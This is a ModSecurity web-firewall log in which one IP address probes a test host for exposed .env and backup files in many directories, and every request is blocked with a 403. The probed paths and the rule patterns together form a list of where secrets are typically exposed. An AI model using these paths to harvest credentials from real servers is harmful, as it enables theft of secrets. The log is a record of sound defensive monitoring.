[Wed Dec 10 17:36:30.646278 2025] [:error] [pid 642268] [client 45.148.10.247:47574] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aTmhjijDeI-4sHVdKxOQwgAAAAw"]
[Wed Dec 10 17:36:30.646486 2025] [:error] [pid 642268] [client 45.148.10.247:47574] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aTmhjijDeI-4sHVdKxOQwgAAAAw"]
[Wed Dec 10 17:36:30.728270 2025] [:error] [pid 636936] [client 45.148.10.247:47578] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aTmhjij7S3f8o0DuYfxzsgAAAAE"]
[Wed Dec 10 17:36:30.728505 2025] [:error] [pid 636936] [client 45.148.10.247:47578] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aTmhjij7S3f8o0DuYfxzsgAAAAE"]
[Wed Dec 10 17:36:30.728684 2025] [:error] [pid 636936] [client 45.148.10.247:47578] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aTmhjij7S3f8o0DuYfxzsgAAAAE"]
[Wed Dec 10 17:36:30.751806 2025] [:error] [pid 636936] [client 45.148.10.247:47578] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aTmhjij7S3f8o0DuYfxzswAAAAE"]
[Wed Dec 10 17:36:30.752146 2025] [:error] [pid 636936] [client 45.148.10.247:47578] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aTmhjij7S3f8o0DuYfxzswAAAAE"]
[Wed Dec 10 17:36:30.752398 2025] [:error] [pid 636936] [client 45.148.10.247:47578] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aTmhjij7S3f8o0DuYfxzswAAAAE"]
[Wed Dec 10 17:36:32.829588 2025] [:error] [pid 636939] [client 45.148.10.247:47592] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aTmhkLCnovWtbeVvHnHXtgAAAAQ"]
[Wed Dec 10 17:36:32.829939 2025] [:error] [pid 636939] [client 45.148.10.247:47592] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aTmhkLCnovWtbeVvHnHXtgAAAAQ"]
[Wed Dec 10 17:36:32.830210 2025] [:error] [pid 636939] [client 45.148.10.247:47592] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aTmhkLCnovWtbeVvHnHXtgAAAAQ"]
[Wed Dec 10 17:36:36.968077 2025] [:error] [pid 642280] [client 45.148.10.247:47598] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aTmhlBSjobP9P3N0EgkcRgAAAAk"]
[Wed Dec 10 17:36:36.968349 2025] [:error] [pid 642280] [client 45.148.10.247:47598] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aTmhlBSjobP9P3N0EgkcRgAAAAk"]
[Wed Dec 10 17:36:36.968571 2025] [:error] [pid 642280] [client 45.148.10.247:47598] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aTmhlBSjobP9P3N0EgkcRgAAAAk"]
[Wed Dec 10 17:36:39.579872 2025] [:error] [pid 642264] [client 45.148.10.247:47618] [client 45.148.10.247] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aTmhl5V8tnhi0nExSI5-KQAAAAo"]
[Wed Dec 10 17:36:39.580312 2025] [:error] [pid 642264] [client 45.148.10.247:47618] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aTmhl5V8tnhi0nExSI5-KQAAAAo"]
[Wed Dec 10 17:36:39.581008 2025] [:error] [pid 642264] [client 45.148.10.247:47618] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aTmhl5V8tnhi0nExSI5-KQAAAAo"]
[Wed Dec 10 17:36:40.814271 2025] [:error] [pid 642265] [client 45.148.10.247:55870] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aTmhmLP2BPelBlHY7gEfMwAAAAs"]
[Wed Dec 10 17:36:40.814524 2025] [:error] [pid 642265] [client 45.148.10.247:55870] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aTmhmLP2BPelBlHY7gEfMwAAAAs"]
[Wed Dec 10 17:36:40.814703 2025] [:error] [pid 642265] [client 45.148.10.247:55870] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aTmhmLP2BPelBlHY7gEfMwAAAAs"]
[Wed Dec 10 17:36:41.036412 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aTmhmaNE19-36a8V4yFQ5gAAAAc"]
[Wed Dec 10 17:36:41.036642 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aTmhmaNE19-36a8V4yFQ5gAAAAc"]
[Wed Dec 10 17:36:41.036824 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aTmhmaNE19-36a8V4yFQ5gAAAAc"]
[Wed Dec 10 17:36:41.074423 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aTmhmaNE19-36a8V4yFQ5wAAAAc"]
[Wed Dec 10 17:36:41.074672 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aTmhmaNE19-36a8V4yFQ5wAAAAc"]
[Wed Dec 10 17:36:41.074845 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aTmhmaNE19-36a8V4yFQ5wAAAAc"]
[Wed Dec 10 17:36:41.124891 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aTmhmaNE19-36a8V4yFQ6AAAAAc"]
[Wed Dec 10 17:36:41.125141 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aTmhmaNE19-36a8V4yFQ6AAAAAc"]
[Wed Dec 10 17:36:41.125350 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aTmhmaNE19-36a8V4yFQ6AAAAAc"]
[Wed Dec 10 17:36:41.177725 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aTmhmaNE19-36a8V4yFQ6QAAAAc"]
[Wed Dec 10 17:36:41.177967 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aTmhmaNE19-36a8V4yFQ6QAAAAc"]
[Wed Dec 10 17:36:41.178163 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aTmhmaNE19-36a8V4yFQ6QAAAAc"]
[Wed Dec 10 17:36:41.229297 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aTmhmaNE19-36a8V4yFQ6gAAAAc"]
[Wed Dec 10 17:36:41.229545 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aTmhmaNE19-36a8V4yFQ6gAAAAc"]
[Wed Dec 10 17:36:41.229725 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aTmhmaNE19-36a8V4yFQ6gAAAAc"]
[Wed Dec 10 17:36:41.402992 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aTmhmaNE19-36a8V4yFQ6wAAAAc"]
[Wed Dec 10 17:36:41.403266 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aTmhmaNE19-36a8V4yFQ6wAAAAc"]
[Wed Dec 10 17:36:41.403473 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aTmhmaNE19-36a8V4yFQ6wAAAAc"]
[Wed Dec 10 17:36:44.278215 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aTmhnKNE19-36a8V4yFQ7AAAAAc"]
[Wed Dec 10 17:36:44.278480 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aTmhnKNE19-36a8V4yFQ7AAAAAc"]
